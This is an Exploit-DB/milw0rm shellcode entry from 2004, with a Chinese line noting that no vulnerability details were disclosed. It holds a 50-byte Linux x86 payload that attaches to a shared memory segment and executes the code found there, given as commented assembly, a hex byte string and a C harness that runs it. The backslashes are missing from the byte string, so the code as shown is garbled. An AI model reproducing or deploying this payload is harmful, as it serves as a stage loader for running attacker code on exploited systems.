https://www.exploit-db.com/exploits/13432

漏洞细节尚未披露

/* [email protected] - http://www.nopninjas.com

   Platform: Linux x86
   Length: 50 bytes
     
   - This shellcode connects to the shared memory segment matching the key
     and executes the code at that address. 

        xorl    %edi,%edi
        xorl    %esi,%esi
        xorl    %edx,%edx
        movl    $0xdeadbeef,%ecx       * shared memory key *
        xorl    %ebx,%ebx
        movb    $23,%bl
        xorl    %eax,%eax
        movb    $117,%al
        int     $0x80

        xorl    %edi,%edi
        movl    $0xbffffffa,%esi       * pointer storage location *
        xorl    %edx,%edx
        movl    %eax,%ecx
        xorl    %ebx,%ebx
        movb    $21,%bl
        xorl    %eax,%eax
        movb    $117,%al
        int     $0x80

        movl    $0xbffffffa,%eax       * pointer storage location *
        pushl   (%eax)
        ret

*/

char shm[] = "x31xffx31xf6x31xd2xb9xefxbexadxdex31xdbxb3x17x31"
             "xc0xb0x75xcdx80x31xffxbexfaxffxffxbfx31xd2x89xc1"
             "x31xdbxb3x15x31xc0xb0x75xcdx80xb8xfaxffxffxbfxff"
             "x30xc3";
              
int main() {
  void (*shell)() = (void *)&shm;
  shell();
}

// milw0rm.com [2004-09-26]